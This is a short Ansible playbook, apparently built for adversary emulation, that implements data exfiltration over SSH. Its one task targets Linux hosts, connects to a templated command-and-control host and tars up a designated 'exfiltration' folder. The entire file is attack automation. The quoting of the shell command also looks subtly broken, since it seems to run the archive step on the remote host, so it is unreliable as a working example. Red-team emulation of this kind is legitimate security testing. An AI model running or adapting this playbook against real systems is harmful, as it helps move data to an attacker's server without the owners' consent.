# Playbook-T1048
- name : Exfiltration Over Alternative Protocol
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: Exfiltration Over Alternative Protocol - SSH
            shell: |
                ssh {{ cnc_fqdn }} "(cd {{ exfiltration_folder }} && tar -zcvf - *) > ./{{ exfiltration_file }}tar.gz"
